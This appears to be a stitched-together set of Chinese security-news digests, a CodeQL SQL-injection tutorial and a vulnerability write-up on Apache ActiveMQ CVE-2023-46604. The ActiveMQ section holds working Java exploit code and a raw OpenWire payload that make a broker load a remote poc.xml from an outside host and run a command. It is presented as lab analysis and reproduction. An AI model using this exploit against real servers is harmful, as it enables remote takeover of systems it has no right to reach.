1、Netgear和Hyundai的官方X账户被黑用于加密货币诈骗 https://www.bleepingcomputer.com/news/security/netgear-hyundai-latest-x-accounts-hacked-to-push-crypto-drainers/ Netgear 和现代 MEA Twitter/X 官方帐户（共有超过 160000 名关注者）是最新被劫持的帐户，用于推送旨在通过加密货币钱包排水恶意软件感染潜在受害者的诈骗。虽然 Hyundai 已经重新获得了对其帐户的访问权限，并清理了所有将 X 用户指向恶意网站的链接的时间线，但 Netgear 尚未控制他们的帐户，攻击者的一些推文回复仍然可用。攻击者将现代 M 2、Babuk攻击者被捕后发布勒索软件变种解密工具 https://blog.talosintelligence.com/decryptor-babuk-tortilla/ 研究人员与荷兰警方合作，获得了 Babuk 勒索软件 Tortilla 变种的解密工具，并分享了导致勒索软件操作者被捕的情报。Tortilla 是 Babuk 勒索软件变种，在原始恶意软件的源代码在黑客论坛上泄露后不久就出现了。其背后的威胁行为者一直利用 ProxyShell 漏洞攻击 Microsoft Exchange 服务器 来部署数据加密恶意软件。在新变种出现前一个月， Avast 发布了 Babuk 的解密器，但它不适用于 Tortilla 加密，因为它使用了不 3、巴拉圭军方声称Tigo运营商遭勒索攻击数据泄露 https://www.bleepingcomputer.com/news/security/paraguay-warns-of-black-hunt-ransomware-attacks-after-tigo-business-breach/ Tigo Business 上周遭受网络攻击，影响该公司业务部门的云和托管服务后，巴拉圭军方就 Black Hunt 勒索软件攻击发出警告。Tigo 是巴拉圭最大的移动运营商，其 Tigo 业务部门为企业提供数字解决方案，包括网络安全咨询、云和数据中心托管以及广域网 (WAN) 解决方案。周末，当地媒体报道称，自周四以来，各公司在 Tigo Busi 4、攻击者冒充安全人员对Royal和Akira勒索受害者发起攻击 https://arcticwolf.com/resources/blog/follow-on-extortion-campaign-targeting-victims-of-akira-and-royal-ransomware/ 一些受 Royal 和 Akira 勒索软件团伙侵害的组织已成为冒充安全研究人员的威胁行为者的目标，该威胁行为者承诺攻击原始攻击者并删除被盗的受害者数据。Royal 和 Akira 勒索软件操作均采用双重勒索策略——窃取信息后对受害者系统进行加密，并威胁称除非支付赎金，否则就会泄露数据。网络安全公司表示，它已经调查了“几起案件”，在这些案件中，支付赎金的两个勒索软 5、微软1月补丁中修复了49个缺陷和12个远程代码执行漏洞 https://www.bleepingcomputer.com/news/microsoft/microsoft-january-2024-patch-tuesday-fixes-49-flaws-12-rce-bugs/ 今天是微软的 2024 年 1 月补丁星期二，其中包含总共 49 个缺陷和 12 个远程代码执行漏洞的安全更新。只有两个漏洞被列为严重漏洞，一个是 Windows Kerberos 安全功能绕过，另一个是 Hyper-V RCE。 下面列出了每个漏洞类别中的错误数量：10 特权提升漏洞、7 安全功能绕过漏洞、12 个远程代码执行漏洞、11 信息泄露漏洞、6 拒绝服务漏洞 6、研究人员标记 FBot 黑客工具劫持云、支付服务 https://www.securityweek.com/researchers-flag-fbot-hacking-tool-hijacking-cloud-payment-services/ 该工具名为 FBot，能够收集垃圾邮件攻击以及 AWS、PayPal 和 SaaS 帐户劫持的凭据。 7、Ivanti Connect Secure中的两个零日漏洞被积极利用 https://securityaffairs.com/157306/hacking/ivanti-connect-secure-policy-secure-0days.html Ivanti 透露，威胁参与者正在利用其 Connect Secure (ICS) 和 Policy Secure 中的两个零日漏洞。 8、Cloudflare 发现 2023 年 DDoS 攻击流量激增 https://www.cybersecuritydive.com/news/ddos-attacks-surge-cloudflare/704011/ 2023 年，分布式拒绝服务 (DDoS) 攻击达到历史最高水平，受 HTTP/2 快速重置等漏洞利用的推动，攻击数量和强度显着增加。 9、FTC禁止数据经纪公司出售美国人的位置数据 https://www.bleepingcomputer.com/news/security/ftc-bans-data-broker-from-selling-americans-location-data/ 此举是为了回应数据经纪公司公开个人位置数据的做法，这些数据揭露了更多敏感信息，如医疗访问和宗教信仰。 10、中国台湾虎航85.8万条数据泄露 http://www.anquan419.com/knews/24/6534.html 据知道创宇暗网雷达监测，2024年1月9日，中国台湾虎航85.8万条数据泄露，泄露的数据包含客户数据和航班预定数据。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

0x01 安装codeql 去github下载一个对应版本的codeql捆绑包。 https://github.com/github/codeql-action/releases然后解压，这里我是解压到桌面 然后用添加到环境变量中 然后在任意位置输入codeql命令，如果能有以下提示就表示安装成功 然后下载vscode, 并且给vscode安装codeql扩展 0x02 创建codeql数据库 在使用 CodeQL 分析代码之前，需要创建一个 CodeQL 数据库。 创建codeql数据库命令： codeql database create <database> --language=<language-identifier> <database> 是创建数据库的路径 执行命令会自动创建一个文件夹 <language-identifier> 是选定的语言 比如java，python等 比如需要审计一个python程序，那么命令就可以如下 （注意这条命令需要在需要审计的源代码目录中使用，codeql默认是使用当前位置作为源文件目录） codeql database create pythondb --language=python # 也可以用source-root指定源码路径 比如源码文件在d:/python_code codeql database create pythondb --language=python --source-root="d:/python_code" 然后准备好一份python的源代码。我这里是随便去github搜索了一份别人写好的代码 执行完毕后可以发现多了一个文件夹，这个就是codeql创建的数据库 0x03 codeql使用 打开vscode，打开源码文件夹 切换到codeql插件然后选择刚刚codeql创建的数据库文件夹 成功之后点击queries选项里面的蓝色字体，可以快速的创建一个ql查询文件。 选择对应的语法然后回车 成功如下 0x04 ql语法简介 分析一下自动生成的脚本文件是什么意思 import python // 用于引入Python语言的元数据和查询库 比如import java就是引用java的元数据和查询库 from File f // 引入文件（File）元数据的语法 select f, "Hello, world!" // （其实这是一条语句） select和sql中的select类似查询一个具体值 select关键字 和sql的select类似，查询一个字符串的结果。 from关键字 用于定义变量，格式如 from 变量类型 变量名， 如定义字符串变量str如下 （多个变量用逗号分隔） from string str from string str1, string str2 wher关键字 用于赋值和逻辑运算，比如where str = "abcde" 就是将str变量赋值为abcde字符串 where str1 = "a" and str2 = "b" 注意以上语句需要配合使用不能单独使用，这里是和编程语言的语法有一些区别，更加贴近于sql语法 还有一些内置的类，如Function 表示一个函数类 篇幅关系，更多语法查阅官方文档：https://codeql.github.com/docs/ 0x05 实际使用 比如这里是用codeql查找sql注入，个人感觉codeql更加考验对于漏洞的理解，比起其他传统的代码审计工具，codeql显得更加灵活。 codeql其实自带了很多ql脚本，这些脚本可以帮助我们去查找漏洞最简单的方式就是使用 CodeQL CLI 捆绑包中包含的标准查询。 命令格式如下 codeql database analyze <database> --format=<format> --output=<output> //format就是指定分析过程中生成的结果文件的格式，比如csv格式等 //output就是输出的文件名 比如 然后打开生成的result.csv文件 可以看到如下结果 比如查看第一个sql注入漏洞就可以打开/utils/query.py文件 然后找到12行，函数直接excute了sql语句。且中途未经过过滤。 在vs中使用codeql可以编写语句，比如查询query函数在哪个位置 点击鼠标就可以跳转到对应源码界面 然后还可以查询query函数有哪些地方调用了。 import python   from Call call, Name name where call.getFunc() = name and name.getId() = "query" select call, call.getLocation(), "使用了query函数." 然后挑选一个函数去跟踪，发现字符串直接拼接到sql语句中。

1、美国SEC的X账户被盗并虚假宣布称比特币ETF获得批准 https://www.bleepingcomputer.com/news/security/us-secs-x-account-hacked-to-announce-fake-bitcoin-etf-approval/ 美国证券交易委员会的 X 账户今天遭到黑客攻击，发布了关于批准比特币 ETF 在证券交易所上市的虚假公告。今天下午，美国证券交易委员会被黑的 X 账户发布了一条推文，该推文现已删除。“今天，美国证券交易委员会批准比特币 ETF 在注册的国家证券交易所上市，”假 X 帖子中写道。“批准的比特币 ETF 将接受持续的监督和合规措施，以确保持续保护投资者。”该推文包含 SEC 主 2、Kyocera设备管理器中存在新漏洞可能遭受攻击 https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-50916-authentication-coercion-vulnerability-in-kyocera-device-manager/ Kyocera 的设备管理器产品中已披露了一个安全漏洞，不良行为者可能会利用该漏洞在受影响的系统上执行恶意活动。如果未启用‘限制 NTLM：到远程服务器的传出 NTLM 流量’安全策略，则此漏洞允许攻击者强制尝试对其自己的资源（例如恶意 SMB 共享）进行身份验证，以捕获或中继 Active Director 3、思科称UnityConnection严重漏洞可让攻击者获得root 权限 https://www.bleepingcomputer.com/news/security/cisco-says-critical-unity-connection-bug-lets-attackers-get-root/ 思科已经修补了一个关键的 Unity Connection 安全漏洞，该漏洞可以让未经身份验证的攻击者远程获取未修补设备上的 root 权限。 4、亲乌克兰黑客入侵俄罗斯 ISP 以报复 KyivStar 攻击 https://www.bleepingcomputer.com/news/security/pro-ukraine-hackers-breach-russian-isp-in-revenge-for-kyivstar-attack/ 一个名为“Blackjack”的亲乌克兰黑客组织声称，俄罗斯互联网服务提供商 M9com 遭受了网络攻击，这是对 Kyivstar 移动运营商攻击的直接回应。 5、Windows 10 KB5034441安全更新失败并出现错误 https://www.bleepingcomputer.com/news/microsoft/windows-10-kb5034441-security-update-fails-with-0x80070643-errors/ 全球 Windows 10 用户报告安装 Microsoft 1 月补丁星期二更新时出现问题，在尝试安装 BitLocker 的 KB5034441 安全更新时出现 0x80070643 错误。 6、Microsoft Exchange 2019 已结束主流支持 https://www.bleepingcomputer.com/news/microsoft/microsoft-exchange-2019-has-reached-end-of-mainstream-support/ Microsoft 宣布于 2023 年 1 月 9 日结束对其 Exchange Server 2019 本地邮件服务器软件的主流支持。 7、Android 2024 年 1 月安全更新修补了 58 个漏洞 https://www.securityweek.com/androids-january-2024-security-update-patches-58-vulnerabilities/ Android 2024 年的第一个安全更新解决了高严重性的特权提升和信息泄露漏洞。 8、巴西全体公民数据可能遭受大规模泄露 https://securityaffairs.com/157203/security/entire-population-of-brazil-possibly-exposed-in-massive-data-leak.html 数亿巴西个人的私人数据可供威胁行为者公开访问，使个人面临风险。Cybernews 研究揭示了一个可公开访问的 Elasticsearch 实例，其中包含大量属于巴西个人的私人数据。该集群位于云服务器上，包含全名、出生日期、性别和 Cadastro de Pessoas Físicas (CPF) 号码等数据。这个 11 位数字用于识别巴西的个人纳税人。 9、NoaBot僵尸网络针对 SSH 服务器进行恶意挖矿 https://thehackernews.com/2024/01/noabot-latest-mirai-based-botnet.html 自 2023 年初以来，威胁行为者正在使用一种基于 Mirai 的新型僵尸网络NoaBot作为加密货币挖矿活动的一部分。 10、联合国《打击网络犯罪公约》草案基本完成 https://www.secrss.com/articles/62570 由于各国对网络犯罪的定义和界定都不相同，一直以来联合国都缺乏相关领域的公约，也难以达成一致。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、攻击者滥用X传播恶意加密货币广告呈现上升趋势 https://www.bleepingcomputer.com/news/security/x-users-fed-up-with-constant-stream-of-malicious-crypto-ads/ 攻击者正在滥用 X 广告来推广导致加密货币流失、虚假空投和其他诈骗的网站。与所有广告平台一样，X（以前称为 Twitter）声称会根据用户的活动展示广告， 从而产生符合用户兴趣的广告。虽然 Elon 此前曾在推特上表示 YouTube 是不间断的诈骗广告，但 X 似乎也有自己的问题，越来越多地展示宣传加密货币诈骗的广告。这些诈骗包括宣传拉高和转储的 Telegram 频道的链接、 2、攻击者针对存在漏洞的Apache RocketMQ服务器发起攻击 https://www.bleepingcomputer.com/news/security/hackers-target-apache-rocketmq-servers-vulnerable-to-rce-attacks/ 安全研究人员每天都会检测到数百个 IP 地址，这些地址扫描或试图利用易受 CVE-2023-33246 和 CVE-2023-37582 远程命令执行缺陷影响的 Apache RocketMQ 服务。这两个漏洞均具有严重严重性评分，并指的是供应商于 2023 年 5 月发布初始补丁后仍然存在的问题。最初，该安全问题被跟踪为 CVE-2023-33246 ，并影响多个组件 3、Web3安全公司CertiK的X账户被盗取并用于散布钓鱼网站 https://www.bleepingcomputer.com/news/security/web3-security-firm-certiks-x-account-hacked-to-push-crypto-drainer/ 区块链安全公司CertiK的Twitter/X帐户被盗取，超过343,000名关注者被重定向到一个推送加密货币钱包盗取程序的恶意网站。加密货币欺诈侦探ZachXBT 随后公开了网络钓鱼攻击的私信屏幕截图，显示攻击者使用一名记者的被黑账户发送网络钓鱼消息，该记者自2020 年以来一直处于休眠状态，拥有超过100万粉丝，攻击者者利用这个被黑的账户联系了 Certik，询 4、攻击者利用YouTube视频传播破解软件以分发Lumma窃取器 https://www.fortinet.com/blog/threat-research/lumma-variant-on-youtube 攻击者利用包含与破解软件相关内容的 YouTube 视频来诱骗用户下载名为 Lumma 的信息窃取恶意软件。这些 YouTube 视频通常包含与破解应用程序相关的内容，为用户提供类似的安装指南，并包含通常使用 TinyURL 和 Cuttly 等服务缩短的恶意 URL。这并不是 YouTube 上的盗版软件视频第一次成为窃取恶意软件的有效诱饵。此前曾观察到类似的攻击链会传播窃取程序、剪切程序和加密货币挖矿恶意软件。在此过程中，威胁行为者不仅可以利用受感 5、微软紧急修复了Kerberos、Hyper-V 中的严重漏洞 https://www.securityweek.com/microsoft-ships-urgent-fixes-for-critical-flaws-in-windows-kerberos-hyper-v/ 微软周二补丁日修补了困扰 Windows Kerberos 和 Windows Hyper-V 的关键远程代码执行漏洞。 6、CISA 警告 Apache Superset 严重漏洞被利用 https://www.securityweek.com/cisa-warns-of-apache-superset-vulnerability-exploitation/ CISA 已将一个严重级别的 Apache Superset 缺陷 (CVE-2023-27524) 添加到其已知的可利用漏洞目录中。周二Adobe 修复了 Substance 3D Stager 产品中的六个安全漏洞，并警告 Windows 和 macOS 上的代码执行风险。 7、LockBit 勒索团伙对 Capital Health 进行了网络攻击 https://securityaffairs.com/157170/cyber-crime/lockbit-ransomware-hit-capital-health.html LockBit勒索软件行动声称对 2023 年 11 月袭击 Capital Health 医院网络的网络攻击负责。 8、土耳其黑客在全球范围内攻击MS SQL 服务器 https://thehackernews.com/2024/01/turkish-hackers-exploiting-poorly.html 作为正在进行的出于经济动机以获得初始访问权限的活动的一部分，美国、欧盟和拉丁美洲 (LATAM) 地区的安全性较差的 Microsoft SQL (MS SQL) 服务器成为目标。 9、美国抵押贷款机构 loanDepot 遭遇勒索软件攻击 https://www.freebuf.com/news/389190.html 美国一家抵押贷款机构 loanDepot 遭遇一场严重的勒索软件攻击，最终导致其很多内部数据被威胁攻击者加密了。 10、工信部组织开展网络安全保险服务试点工作 https://www.freebuf.com/news/389176.html 2023年12月21日，工业和信息化部发布《工业和信息化部办公厅关于组织开展网络安全保险服务试点工作的通知》。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

漏洞简介 Apache ActiveMQ官方发布新版本，修复了一个远程代码执行漏洞（CNVD-2023-69477  CVE-2023-46604），攻击者可构造恶意请求通过Apache ActiveMQ的61616端口发送恶意数据导致远程代码执行，从而完全控制Apache ActiveMQ服务器。 影响版本 Apache ActiveMQ 5.18.0 before 5.18.3 Apache ActiveMQ 5.17.0 before 5.17.6 Apache ActiveMQ 5.16.0 before 5.16.7 Apache ActiveMQ before 5.15.16 Apache ActiveMQ Legacy OpenWire Module 5.18.0 before 5.18.3 Apache ActiveMQ Legacy OpenWire Module 5.17.0 before 5.17.6 Apache ActiveMQ Legacy OpenWire Module 5.16.0 before 5.16.7 Apache ActiveMQ Legacy OpenWire Module 5.8.0 before 5.15.16 ‍ 环境搭建 没有找到合适的 docker 镜像 ，尝试自己进行编写 可以站在巨人的肩膀上进行编写利用 利用项目 https://github.com/zer0yu/dfimage 分析镜像的dockerfile docker pull islandora/activemq:2.0.7 dfimage islandora/activemq:2.0.7 结合 https://activemq.apache.org/version-5-getting-started Dockerfile FROM ubuntu #ENV DEBIAN_FRONTEND noninteractive RUN sed -i 's/archive.ubuntu.com/mirrors.aliyun.com/g' /etc/apt/sources.list RUN sed -i 's/security.ubuntu.com/mirrors.aliyun.com/g' /etc/apt/sources.list RUN apt-get update -y RUN apt-get install wget -y RUN apt install openjdk-11-jre-headless -y COPY apache-activemq-5.18.2-bin.tar.gz / #RUN wget https://archive.apache.org/dist/activemq/5.18.2/apache-activemq-5.18.2-bin.tar.gz RUN tar zxvf apache-activemq-5.18.2-bin.tar.gz RUN chmod 755 /apache-activemq-5.18.2/bin/activemq RUN echo  '#!/bin/bash\n\n/apache-activemq-5.18.2/bin/activemq start\ntail -f /dev/null' > start.sh RUN chmod +x start.sh EXPOSE 8161 61616 CMD ["/start.sh"] ## 默认启动后 8161 的管理端口仅能通过 127.0.0.1 本地地址进行访问 可以通过修改 /conf/jetty.xml docker-compose.yml version: "2.2" services: activemq:   build: .   ports:     - "8161:8161"     - "61616:61616" ./activemq start ./activemq status ./activemq console netstat -tuln | grep 8161 netstat -tuln | grep 61616 ‍ 漏洞分析 下载源代码 https://archive.apache.org/dist/activemq/5.18.2/activemq-parent-5.18.2-source-release.zip 开启调试只需要修改 apache-activemq-5.18.2\bin\activemq https://github.com/apache/activemq/compare/activemq-5.18.2..activemq-5.18.3 新版本的修复位置是在 org.apache.activemq.openwire.v11.BaseDataStreamMarshaller#createThrowable ClassName 和 message 可控，代表着可以调用任意类的 String 构造方法，AvtiveMQ 内置 Spring，结合 org.springframework.context.support.ClassPathXmlApplicationContext 加载远程配置文件实现 SPEL 表达式注入。 寻找调用该方法的位置 org.apache.activemq.openwire.v11.BaseDataStreamMarshaller#looseUnmarsalThrowable 继续向上寻找调用 网上大部分都选用了 ExceptionResponseMarshaller 我们也基于此进行分析 org.apache.activemq.openwire.v11.ExceptionResponseMarshaller#looseUnmarshal 继续向上寻找调用 org.apache.activemq.openwire.OpenWireFormat#doUnmarshal 我们看到此时 dsm 的值是基于传入的 dis.readByte(); <transportConnector name="openwire" uri="tcp://0.0.0.0:61616?maximumConnections=1000&amp;wireFormat.maxFrameSize=104857600"/> ActiveMQ中默认的消息协议就是openwire ‍编写一个 ActiveMQ 的通信请求 public static void sendToActiveMQ() throws Exception {        /*         * 创建连接工厂，由 ActiveMQ 实现。构造方法参数         * userName 用户名         * password 密码         * brokerURL 访问 ActiveMQ 服务的路径地址，结构为: 协议名://主机地址:端口号         */        ConnectionFactory connectionFactory = new ActiveMQConnectionFactory("admin", "admin", "tcp://127.0.0.1:61616");        //创建连接对象        Connection connection = connectionFactory.createConnection();        //启动连接        connection.start();        /*         * 创建会话，参数含义:         * 1.transacted - 是否使用事务         * 2.acknowledgeMode - 消息确认机制，可选机制为：         * 1）Session.AUTO_ACKNOWLEDGE - 自动确认消息         * 2）Session.CLIENT_ACKNOWLEDGE - 客户端确认消息机制         * 3）Session.DUPS_OK_ACKNOWLEDGE - 有副本的客户端确认消息机制         */        Session session = connection.createSession(false, Session.AUTO_ACKNOWLEDGE);        //创建目的地，也就是队列名        Destination destination = session.createQueue("q_test");        //创建消息生成者，该生成者与目的地绑定        MessageProducer mProducer = session.createProducer(destination);        //创建消息        Message message = session.createTextMessage("Hello, ActiveMQ");        //发送消息        mProducer.send(message);        connection.close();   } 前面的调用栈为 doUnmarshal:379, OpenWireFormat (org.apache.activemq.openwire) unmarshal:290, OpenWireFormat (org.apache.activemq.openwire) readCommand:240, TcpTransport (org.apache.activemq.transport.tcp) doRun:232, TcpTransport (org.apache.activemq.transport.tcp) run:215, TcpTransport (org.apache.activemq.transport.tcp) run:829, Thread (java.lang) 此时 datatype 为 1 调用的是 WireFormatInfoMarshaller 我们要想办法调用 datatype 为 31 的 ExceptionResponseMarshaller 花式触发 ExceptionResponseMarshaller 现在我们的目的就是为了去调用 ExceptionResponseMarshaller 寻找触发 ActiveMQ 中的 ExceptionResponse 函数 org.apache.activemq.ActiveMQSession#asyncSendPacket 和 函数 org.apache.activemq.ActiveMQSession#syncSendPacket 都可以发送 command 最后会调用到 org.apache.activemq.transport.tcp.TcpTransport#oneway 也可以通过 ((ActiveMQConnection)connection).getTransportChannel().oneway(expetionResponse); 和 ((ActiveMQConnection)connection).getTransportChannel().request(expetionResponse); 来触发 ‍    public static void ExceptionResponseExploit() throws Exception {        ConnectionFactory connectionFactory = new ActiveMQConnectionFactory("tcp://127.0.0.1:61616");        Connection connection = connectionFactory.createConnection("admin","admin");        connection.start();        ActiveMQSession ExploitSession =(ActiveMQSession) connection.createSession(false, Session.AUTO_ACKNOWLEDGE);        ExceptionResponse expetionResponse = new ExceptionResponse();        expetionResponse.setException(new ClassPathXmlApplicationContext("http://192.168.184.1:9090/poc.xml"));        ExploitSession.syncSendPacket(expetionResponse);        //ExploitSession.asyncSendPacket(expetionResponse);        //((ActiveMQConnection)connection).getTransportChannel().oneway(expetionResponse);        //((ActiveMQConnection)connection).getTransportChannel().request(expetionResponse);        connection.close();   } 由于 ExceptionResponse 实例化的时候必须传入 Throwable 类型，但是 ClassPathXmlApplicationContext 不是该类型，所以需要 修改 ClassPathXmlApplicationContext 继承 Throwable 。添加如下代码 package org.springframework.context.support; public class ClassPathXmlApplicationContext extends Throwable{    public ClassPathXmlApplicationContext(String message) {        super(message);   } } 相同的方法可以运用在 ConnectionErrorMarshaller 和 MessageAckMarshaller   public static void ConnectionErrorExploit() throws Exception {        ConnectionFactory connectionFactory = new ActiveMQConnectionFactory("tcp://127.0.0.1:61616");        Connection connection = connectionFactory.createConnection("admin","admin");        connection.start();        ActiveMQSession ExploitSession =(ActiveMQSession) connection.createSession(false, Session.AUTO_ACKNOWLEDGE);        ConnectionError connectionError = new ConnectionError();        connectionError.setException(new ClassPathXmlApplicationContext("http://192.168.184.1:9090/poc.xml"));        //ExploitSession.syncSendPacket(connectionError);        //ExploitSession.asyncSendPacket(connectionError);       ((ActiveMQConnection)connection).getTransportChannel().oneway(connectionError);        connection.close();   }    public static void MessageAckExploit() throws Exception {        ConnectionFactory connectionFactory = new ActiveMQConnectionFactory("tcp://127.0.0.1:61616");        Connection connection = connectionFactory.createConnection("admin","admin");        connection.start();        ActiveMQSession ExploitSession =(ActiveMQSession) connection.createSession(false, Session.AUTO_ACKNOWLEDGE);        MessageAck messageAck  = new MessageAck();        messageAck.setPoisonCause(new ClassPathXmlApplicationContext("http://192.168.184.1:9090/poc.xml"));        ExploitSession.syncSendPacket(messageAck);        //ExploitSession.asyncSendPacket(messageAck);        //((ActiveMQConnection)connection).getTransportChannel().oneway(messageAck);        connection.close();   } ‍通过数据流进行触发 ExceptionResponseMarshaller ‍主要是依据 ActiveMQ的协议 去触发 ExceptionResponseMarshaller        String ip = "127.0.0.1";        int port = 61616;        String pocxml= "http://192.168.184.1:9090/poc.xml";        Socket sck = new Socket(ip, port);        OutputStream os = sck.getOutputStream();        DataOutputStream out = new DataOutputStream(os);        out.writeInt(0); //        out.writeByte(31); //dataType ExceptionResponseMarshaller        out.writeInt(1); //CommandId        out.writeBoolean(true); //ResponseRequired        out.writeInt(1); //CorrelationId        out.writeBoolean(true);        //use true -> red utf-8 string        out.writeBoolean(true);        out.writeUTF("org.springframework.context.support.ClassPathXmlApplicationContext");        //use true -> red utf-8 string        out.writeBoolean(true);        out.writeUTF(pocxml);        //call org.apache.activemq.openwire.v1.BaseDataStreamMarshaller#createThrowable cause rce        out.close();        os.close();        sck.close(); ‍通过伪造类实现触发 ExceptionResponse ‍我们看到 org.apache.activemq.transport.tcp.TcpTransport#readCommand 利用 wireFormat.unmarshal 来对数据进行处理 所以我们找到相对应的 wireFormat.marshal org.apache.activemq.transport.tcp.TcpTransport#oneway 通过本地新建 org.apache.activemq.transport.tcp.TcpTransport 类重写对应逻辑，运行时优先触发本地的 TcpTransport 类 /**     * A one way asynchronous send     */    @Override    public void oneway(Object command) throws IOException {        checkStarted();        Throwable obj = new ClassPathXmlApplicationContext("http://192.168.184.1:9090/poc.xml");        ExceptionResponse response = new ExceptionResponse(obj);        wireFormat.marshal(response, dataOut);        dataOut.flush();   } 将发送的请求无论是什么数据都修改为 触发 ExceptionResponseMarshaller ，同样也因为 ExceptionResponse 实例化的时候必须传入 Throwable 类型，但是 ClassPathXmlApplicationContext 不是该类型，所以需要 修改 ClassPathXmlApplicationContext 继承 Throwable 。必须添加如下代码 package org.springframework.context.support; public class ClassPathXmlApplicationContext extends Throwable{    public ClassPathXmlApplicationContext(String message) {        super(message);   } } ‍poc.xml <?xml version="1.0" encoding="UTF-8" ?>    <beans xmlns="http://www.springframework.org/schema/beans"       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"       xsi:schemaLocation="     http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">        <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">            <constructor-arg >            <list>                <value>touch</value>                <value>/tmp/1.txt</value>            </list>            </constructor-arg>        </bean>    </beans> ‍漏洞复现 ‍

1、朝鲜攻击者在2023年窃取了6亿美元的加密货币 https://www.trmlabs.com/post/north-korean-hackers-stole-600-million-in-crypto-in-2023 2023 年，隶属于朝鲜民主主义人民共和国（也称为朝鲜）的威胁行为者已经掠夺了至少 6 亿美元的加密货币。尽管比 2022 年的 8.5 亿美元减少了 30%，但朝鲜“在去年加密货币攻击中被盗的资金中几乎占到了三分之一”。朝鲜实施的黑客攻击造成的平均破坏性是与朝鲜无关的黑客攻击的十倍。有迹象表明，到 2023 年底，针对加密货币行业的更多违规行为可能会将这一数字推高至 7 亿美元左右。对于朝鲜国家支持的行为者来说，针对加密 2、AsyncRAT恶意软件针对美国基础设施攻击持续11个月 https://cybersecurity.att.com/blogs/labs-research/asyncrat-loader-obfuscation-dgas-decoys-and-govno 向选定目标传送 AsyncRAT 恶意软件的活动至少在过去 11 个月内一直活跃，使用了数百个独特的加载程序样本和 100 多个域。AsyncRAT 是一款适用于 Windows 的开源远程访问工具 (RAT)，自 2019 年起公开发布，具有远程命令执行、键盘记录、数据泄露和删除额外负载的功能。多年来，该工具已被网络攻击者大量使用，无论是原样还是修改后的形式，用于在目标上建立立足点、窃取文件和 3、量子安全算法CRYSTALS-Kyber存在KyberSlash安全缺陷 https://github.com/pq-crystals/kyber 用于量子安全加密的 Kyber 密钥封装机制的多种实现很容易受到一组统称为 KyberSlash 的漏洞的影响，这些缺陷可能允许恢复秘密密钥。CRYSTALS-Kyber 是量子安全算法 (QSA) 的 Kyber 密钥封装机制 (KEM) 的官方实现，也是 CRYSTALS（代数格密码学套件）算法套件的一部分。它专为通用加密而设计，是美国国家标准与技术研究所 (NIST) 选择旨在抵御量子计算机攻击的算法的一部分。使用 Kyber 实现的一些流行项目包括 Mulvad VPN 和 SignalMessenger。后者 4、QNAP 修补QTS等多个产品中的高严重性漏洞 https://www.securityweek.com/qnap-patches-high-severity-flaws-in-qts-video-station-qumagie-netatalk-products/ QNAP 已针对其产品中的十几个漏洞发布了补丁，其中包括几个高严重性漏洞。 5、瑞士空军敏感文件在黑客攻击中被盗 https://securityaffairs.com/157144/cyber-crime/swiss-air-force-data-leak.html 由于美国安全提供商遭受网络攻击，瑞士空军的文件在暗网上泄露。 6、沙特部委暴露敏感数据长达 15 个月 https://securityaffairs.com/157133/security/saudi-ministry-data-leak.html 沙特工业和矿产资源部 (MIM) 的环境文件被曝光，敏感细节向任何愿意获取这些信息的人开放。 7、报告：2023 年网络攻击使 Web3 损失 18.4 亿美元 https://www.infosecurity-magazine.com/news/cyber-attacks-drain-web3 根据 Certik 的Hack3d：2023 年 Web3 安全报告，2023年，针对 Web3 的网络攻击共发生 751 起事件，给组织造成了 18.4 亿美元的损失。 8、交通运输部印发《铁路关键信息基础设施安全保护管理办法》 https://www.freebuf.com/news/389150.html 因此，为保障铁路系统的安全稳定运行，必须制定一套全面有效的管理办法，以加强铁路关键信息基础设施的安全保护。基于这样的背景，中华人民共和国交通运输部近期公布了《铁路关键信息基础设施安全保护管理办法》（以下简称《办法》），进一步完善了我国铁路关键基础设施信息安全保障体系。（《办法》已于 2023 年 12 月 1 日经第 27 次部务会议通过，自 2024年 2 月 1 日起施行） 9、黑客劫持 X 上的政府和企业认证账户用于加密货币诈骗 https://www.bleepingcomputer.com/news/security/hackers-hijack-govt-and-business-accounts-on-x-for-crypto-scams/ 来越多黑客盯上了 X（原 Twitter）上的政府和企业官方账户，这些认证账户侧边一般都标有 "金色 "或 "灰色 "对勾。黑客劫持这些账号后，会借助其进行推广加密货币诈骗、钓鱼网站和加密货币放水网站等。 https://www.bleepingcomputer.com/news/security/hackers-hijack-govt-and-business-accounts-on-x-for-crypto-scams/ 10、Zeppelin勒索软件源码在暗网以 500 美元的价格售出 https://www.bleepingcomputer.com/news/security/zeppelin-ransomware-source-code-sold-for-500-on-hacking-forum/ 一名威胁行为者在一个网络犯罪论坛上宣布，他们仅以 500 美元的价格出售了 Zeppelin 勒索软件生成器的源代码和破解版。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

